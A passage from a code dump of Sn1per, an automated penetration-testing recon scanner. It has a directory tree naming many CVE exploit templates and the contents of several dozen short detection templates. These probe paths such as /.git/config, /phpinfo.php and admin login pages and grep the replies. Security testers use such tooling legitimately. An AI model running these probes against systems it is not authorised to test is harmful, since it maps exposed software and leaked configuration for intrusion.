├── sn1per.png
├── bin
├── report.py
├── slack.sh
├── waybackurls.py
├── waybackrobots.py
├── github-subdomains.py
└── webscreenshot.js
├── loot
└── README.md
├── Dockerfile.blackarch
├── templates
├── active
│ ├── Drupal_Scanner_1.sh
│ ├── Apache_Solr_Scanner.sh
│ ├── Clear-text_Communications_HTTP.sh
│ ├── Drupal_Scanner_3.sh
│ ├── Drupal_Scanner_2.sh
│ ├── F5_BIG-IP_Scanner.sh
│ ├── Joomla_Scanner_1.sh
│ ├── PHP_Info.sh
│ ├── Clickjacking.sh
│ ├── Jenkins_Scanner.sh
│ ├── Joomla_Scanner_2.sh
│ ├── Sitemap.xml_Detected.sh
│ ├── Wordpres_Scanner_1.sh
│ ├── AvantFAX_LOGIN_Detected.sh
│ ├── Cisco_VPN_Scanner.sh
│ ├── Git_Config_Detected.sh
│ ├── JK_Status_Manager.sh
│ ├── MobileIron_Login_2.sh
│ ├── Web_Config_Detected.sh
│ ├── Wordpres_Scanner_2.sh
│ ├── cPanel_Login_Found.sh
│ ├── AWS_S3_Public_Bucket_Listing.sh
│ ├── Citrix_VPN_Scanner.sh
│ ├── Citrix_VPN_Scanner_2.sh
│ ├── Confluence_Scanner.sh
│ ├── F5_BIG-IP_Scanner_2.sh
│ ├── MobileIron_Login_1.sh
│ ├── MobileIron_Login_3.sh
│ ├── WebLogic_Scanner.sh
│ ├── Wordpres_Scanner_3.sh
│ ├── phpMyAdmin_Scanner_1.sh
│ ├── Drupal_User_Login.sh
│ ├── Jetty_Version_Disclosure.sh
│ ├── SQLiteManager_Scanner_1.sh
│ ├── cPanel_Login_Found_2.sh
│ ├── Cisco_VPN_Login_Scanner.sh
│ ├── Jaspersoft_Detected.sh
│ ├── Jira_Scanner_1.sh
│ ├── Jolokia_Version_Disclosure.sh
│ ├── Robots.txt_Detected.sh
│ ├── SolarWinds_Orion_Panel.sh
│ ├── Tiki_Wiki_CMS_Groupware_Scanner.sh
│ ├── Directory_Listing_Enabled.sh
│ ├── Jira_Scanner_2.sh
│ ├── PHP_Composer_Disclosure.sh
│ ├── TeamQuest_Login_Found.sh
│ ├── Citrix-Access-Gateway_Detected.sh
│ ├── Drupal_Install_Found.sh
│ ├── Drupal_Version_Disclosure.sh
│ ├── PulseSecure_VPN_Detected.sh
│ ├── Jira_Scanner_3.sh
│ ├── Unauthenticated_Jenkins_Dashboard_Detected.sh
│ ├── Frontpage_Service_Password_Disclosure.sh
│ ├── Mailman_Version_Disclosure.sh
│ ├── RabbitMQ_Management_Interface_Detected.sh
│ ├── Weblogic_Application_Server_Detected.sh
│ ├── Joomla_Version_Disclosure.sh
│ ├── Apache_Tomcat_Scanner.sh
│ ├── Common_Status_File_Scanner_1.sh
│ ├── MS_SQL_Reporting_Server_Scanner_2.sh
│ ├── Common_Status_File_Scanner_3.sh
│ ├── Fortigate_Pulse_Connect_Secure_Scanner.sh
│ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh
│ ├── CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh
│ ├── Common_Status_File_Scanner_2.sh
│ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh
│ ├── MS_SQL_Reporting_Server_Scanner_1.sh
│ ├── CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh
│ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh
│ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh
│ ├── CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh
│ ├── CVE-2019-5418_-_Rail_File_Content_Disclosure.sh
│ ├── Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh
│ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh
│ ├── CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh
│ ├── CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh
│ ├── Laraval_Environment_File_Found.sh
│ ├── Telerik_File_Upload_Web_UI.sh
│ ├── Weak_Authentication_Scanner.sh
│ ├── Wordpress_WP-File-Manager_Version_Detected.sh
│ ├── CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh
│ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh
│ ├── CVE-2019-11581_-_Jira_Template_Injection.sh
│ ├── CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh
│ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh
│ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh
│ ├── CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled
│ ├── CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh
│ ├── CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh
│ ├── CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh
│ ├── CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh
│ ├── CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh
│ ├── CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh
│ ├── CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh
│ ├── CVE-2020-25213_-_WP_File_Manager_File_Upload.sh
│ ├── CVE-2020-5902_-_F5_BIG-IP_XSS.sh
│ ├── CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh
│ ├── CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh
│ ├── CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh
│ ├── CVE-2020-8512_-_IceWarp_WebMail_XSS.sh
│ ├── Contact_Form_7_Wordpress_Plugin_Found_1.sh
│ ├── CVE-2019-8451_Jira_SSRF_1.sh
│ ├── CVE-2020-15129_-_Open_Redirect_In_Traefik.sh
│ ├── ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh
│ ├── CVE-2019-8451_Jira_SSRF_2.sh
│ ├── CVE-2019-8451_Jira_SSRF_3.sh
│ ├── CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh
│ ├── CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh
│ ├── Contact_Form_7_Wordpress_Plugin_Found_2.sh
│ ├── RabbitMQ_Management_Default_Credentials.sh
│ ├── CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh
│ ├── CVE-2019-19908_-_phpMyChat-Plus_XSS.sh
│ ├── CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh
│ ├── CVE-2019-8451_Jira_SSRF_4.sh
│ ├── CVE-2020-0618_-_Remote_Code_Execution_SQL_Server_Reporting_Services.sh
│ ├── CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh
│ ├── CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_1.sh
│ ├── CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh
│ ├── CVE-2020-14181_-_User_Enumeration_Via_Insecure_Jira_Endpoint.sh
│ ├── CVE-2020-8115_-_Revive_Adserver_XSS.sh
│ ├── CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh
│ ├── CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh
│ ├── CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh
│ ├── CVE-2020-11530_-_Wordpress_Chop_Slider_3_Plugin_SQL_Injection.sh
│ ├── VMware_vCenter_Unauthenticated_Arbitrary_File_Read.sh
│ ├── CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh
│ ├── CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh
│ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh
│ ├── CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh
│ ├── CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh
│ ├── CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh
│ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh
│ ├── CVE-2020-2551_-_Unauthenticated_Oracle_WebLogic_Server_Remote_Code_Execution.sh
│ ├── CVE-2020-5405_-_Spring_Directory_Traversal_1.sh
│ ├── SAP_NetWeaver_AS_JAVA_LM_Configuration_Wizard_Detection.sh
│ ├── CVE-2020-5405_-_Spring_Directory_Traversal_2.sh
│ ├── CVE-2020-5405_-_Spring_Directory_Traversal_3.sh
│ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh
│ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh
│ ├── CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh
│ ├── CVE-2020-14815_-_Oracle_Business_Intelligence_Enterprise_DOM_XSS.sh
│ ├── CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Config_Password_Disclosure.sh
│ ├── CVE-2020-7048_-_WP_Database_Reset_3.15_Unauthenticated_Database_Reset.sh
│ ├── CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh
│ ├── CVE-2020-3452_-_Cisco_ASA-FTD_Arbitrary_File_Reading_Vulnerability.sh
│ ├── Magento_2.3.0_SQL_Injection.sh
│ ├── SolarWinds_Orion_Default_Credentials_1.sh
│ ├── SolarWinds_Orion_Default_Credentials_2.sh
│ ├── CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh
│ ├── CVE-2020-8772_-_IfiniteWP_Client_1.9.4.5_Authentication_Bypass_1.sh
│ ├── CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh
│ ├── CVE-2020-8115_-_Revive_Adserver_XSS.py
│ ├── CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh
│ ├── CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh
│ ├── CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh
│ ├── CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh
│ ├── XSS.py
│ ├── CVE-2019-19719_Tableau_Server_DOM_XSS.py
│ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh
│ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh
│ ├── CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh
│ ├── CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh
│ ├── CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled
│ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh
│ ├── CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh
│ ├── CVE-2019-17558_-_Apache_Solr_RCE.sh
│ └── CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh
└── passive
│ ├── web
│ ├── Trace_Method_Enabled.sh
│ ├── Drupal_Detected.sh
│ ├── Autocomplete_Enabled.sh
│ ├── X-Powered-By_Header_Found.sh
│ ├── Expired_SSL_Certificate.sh
│ ├── Insecure_SSL_TLS_Connection.sh
│ ├── CORS_Policy_-_Allow-Origin_Wildcard.sh
│ ├── Insecure_Cookie_-_Secure_Not_Set.sh
│ ├── Interesting_Title_Found.sh
│ ├── Insecure_Cookie_-_HTTPOnly_Not_Set.sh
│ ├── CORS_Policy_-_Allow-Credentials_Enabled.sh
│ ├── Clear-text_Communications_HTTP.sh
│ ├── Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh
│ ├── Insecure_SSL_TLS_Connection_CN_Mismatch.sh
│ ├── Strict_Tranposrt_Security_Not_Enforced.sh
│ ├── Server_Header_Disclosure.sh
│ ├── Clickjacking.sh
│ ├── CSP_Not_Enforced.sh
│ └── recursive
│ │ ├── Nikto_Vulnerability_Scan-HTTP.sh
│ │ ├── Nikto_Vulnerability_Scan-HTTPS.sh
│ │ ├── Wordpress_Vulnerability_Scan_-_HTTP_1.sh
│ │ ├── Wordpress_Vulnerability_Scan_-_HTTP_2.sh
│ │ ├── Wordpress_Vulnerability_Scan_-_HTTPS_1.sh
│ │ ├── Wordpress_Vulnerability_Scan_-_HTTPS_2.sh
│ │ ├── Arachni_Vulnerability_Scan.disabled
│ │ ├── Arachni_Vulnerability_Scan_-_HTTP.sh
│ │ ├── Arachni_Vulnerability_Scan_-_HTTPS.sh
│ │ ├── Nuclei_Vulnerability_Scan_-_HTTP.sh
│ │ └── Nuclei_Vulnerability_Scan_-_HTTPS.sh
│ └── network
│ ├── SMBv1_Enabled.sh
│ ├── Lack_of_SPF_DNS_Record.sh
│ ├── Subjack_Takeover_Detected.sh
│ ├── Subover_Takeover_Detected.sh
│ ├── SSH_Version_Disclosure.sh
│ ├── Default_Credentials_NMap.sh
│ ├── Interesting_Domain_Found.sh
│ ├── SMB_Info_Disclosure.sh
│ ├── CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh
│ ├── Default_Credentials_BruteX.sh
│ ├── Possible_Takeover_Detected.sh
│ └── recursive
│ ├── Component_With_Known_Vulnerabilities_-_NMap.sh
│ └── Interesting_Ports_Found.sh
├── docker-compose.yml
├── docker-compose-blackarch.yml
├── sn1per.desktop
├── .github
└── workflows
│ └── semgrep.yml
├── uninstall.sh
├── modes
├── web.sh
├── sc0pe-active-webscan.sh
├── osint_stage_2.sh
├── sc0pe-network-scan.sh
├── bruteforce.sh
├── masswebscan.sh
├── nuke.sh
├── massportscan.sh
├── massweb.sh
├── massvulnscan.sh
├── sc0pe-passive-webscan.sh
├── airstrike.sh
├── fullportscan.sh
├── sc0pe.sh
├── javascript-analysis.sh
├── static-grep-search.sh
├── discover.sh
└── fullportonly.sh
├── Dockerfile
├── wordlists
├── vhosts.txt
├── altdns.txt
└── web-brute-stealth.txt
├── pro
└── notepad.html
└── LICENSE.md
/sn1per.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/Sn1per/HEAD/sn1per.png
--------------------------------------------------------------------------------
/bin/report.py:
--------------------------------------------------------------------------------
1 | import pdfkit
2 | pdfkit.from_url('/usr/share/sniper/loot/workspace/hulu/sniper-report.html', 'out.pdf')
3 |
--------------------------------------------------------------------------------
/loot/README.md:
--------------------------------------------------------------------------------
1 | # Sn1per - Automated Pentest Recon Scanner
2 | 
3 |
--------------------------------------------------------------------------------
/Dockerfile.blackarch:
--------------------------------------------------------------------------------
1 | FROM docker.io/blackarchlinux/blackarch:latest
2 |
3 | # Upgrade system
4 | RUN pacman -Syu --noconfirm
5 |
6 | # Install sn1per from official repository
7 | RUN pacman -Sy sn1per --noconfirm
8 |
9 | CMD ["sn1per"]
--------------------------------------------------------------------------------
/templates/active/Drupal_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Drupal Detected 1'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="drupal\.org"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Apache_Solr_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Apache Solr Detected'
3 | URI=''
4 | METHOD='GET'
5 | MATCH="Solr\ Admin"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Clear-text_Communications_HTTP.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Clear-Text Protocol - HTTP'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH='200 OK'
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_Scanner_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Drupal Detected 2'
3 | URI='/blog/'
4 | METHOD='GET'
5 | MATCH="drupal\.org"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/Trace_Method_Enabled.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='TRACE Method Enabled'
3 | FILENAME="$LOOT_DIR/web/http_options-$TARGET-*.txt"
4 | MATCH='TRACE'
5 | SEVERITY='P4 - LOW'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/Drupal_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Drupal Detected 3'
3 | URI='/drupal/'
4 | METHOD='GET'
5 | MATCH="drupal\.org"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/F5_BIG-IP_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='F5 BIG-IP Detected'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH='F5 BIG-IP'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Joomla_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Joomla Detected 1'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH='content="Joomla! '
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/PHP_Info.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='PHP Info Detected 1'
3 | URI='/phpinfo.php'
4 | METHOD='GET'
5 | MATCH='>PHP Version \<'
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-e'
--------------------------------------------------------------------------------
/templates/active/Clickjacking.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Clickjacking'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH='X-Frame-Options'
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -I"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
10 | SEARCH="negative"
--------------------------------------------------------------------------------
/templates/active/Jenkins_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Jenkins Detected'
3 | URI='/login?from=%2F'
4 | METHOD='GET'
5 | MATCH="\[Jenkins\]"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Joomla_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Joomla Detected 1'
3 | URI='/joomla/'
4 | METHOD='GET'
5 | MATCH='content="Joomla! '
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Sitemap.xml_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Sitemap.xml Detected'
3 | URI='/sitemap.xml'
4 | METHOD='GET'
5 | MATCH='<?xml\ '
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Wordpres_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress Detected 1'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="content\=\"WordPress"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/SMBv1_Enabled.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='SMBv1 Enabled'
3 | FILENAME="$LOOT_DIR/output/nmap-$TARGET-*.txt"
4 | MATCH="SMBv1"
5 | SEVERITY='P3 - MEDIUM'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
--------------------------------------------------------------------------------
/templates/passive/web/Drupal_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Drupal Detected'
3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
4 | MATCH="X\-Generator\:\ Drupal\ "
5 | SEVERITY='P5 - INFO'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/AvantFAX_LOGIN_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='AvantFAX LOGIN Detected'
3 | URI=''
4 | METHOD='GET'
5 | MATCH="AvantFAX\ LOGIN"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Cisco_VPN_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Cisco VPN Detected'
3 | URI='/+CSCOE+/win.js'
4 | METHOD='GET'
5 | MATCH="CSCO_WebVPN"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Git_Config_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Git Config Detected 1'
3 | URI='/.git/config'
4 | METHOD='GET'
5 | MATCH="\[core\]"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/JK_Status_Manager.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='JK Status Manager'
3 | URI='/jkstatus/'
4 | METHOD='GET'
5 | MATCH="JK\ Status\ Manager"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/MobileIron_Login_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='MobileIron Login 2'
3 | URI='/mifs/login.jsp'
4 | METHOD='GET'
5 | MATCH="MobileIron"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Web_Config_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Web Config Detected 1'
3 | URI='/web.config'
4 | METHOD='GET'
5 | MATCH='<configuration>'
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="-L --user-agent '' -s --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Wordpres_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress Detected 2'
3 | URI='/blog/'
4 | METHOD='GET'
5 | MATCH="content\=\"WordPress"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/cPanel_Login_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='cPanel Login Found'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="cPanel\ Login"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS=''
10 |
--------------------------------------------------------------------------------
/templates/active/AWS_S3_Public_Bucket_Listing.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='AWS S3 Public Bucket Listing'
3 | URI=''
4 | METHOD='GET'
5 | MATCH="listbucket"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Citrix_VPN_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Citrix VPN Detected'
3 | URI='/vpn/index.html'
4 | METHOD='GET'
5 | MATCH="Netscaler\ Gateway"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Citrix_VPN_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Citrix VPN Detected 2'
3 | URI='/vpn/index.html'
4 | METHOD='GET'
5 | MATCH="NetScaler "
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Confluence_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Atlassian Confluence Detected'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="Atlassian\ Confluence"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/F5_BIG-IP_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='F5 BIG-IP Detected 2'
3 | URI='/tmui/login.jsp'
4 | METHOD='GET'
5 | MATCH='<title>F5 BIG-IP'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/MobileIron_Login_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='MobileIron Login 1'
3 | URI='/mifs/user/login.jsp'
4 | METHOD='GET'
5 | MATCH="MobileIron"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/MobileIron_Login_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='MobileIron Login 3'
3 | URI='/mifs/c/d/android.html'
4 | METHOD='GET'
5 | MATCH="MobileIron"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/WebLogic_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='WebLogic Detected'
3 | URI='/console/login/LoginForm.jsp'
4 | METHOD='GET'
5 | MATCH='WebLogic'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Wordpres_Scanner_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress Detected 3'
3 | URI='/wordpress/'
4 | METHOD='GET'
5 | MATCH="content\=\"WordPress"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/phpMyAdmin_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
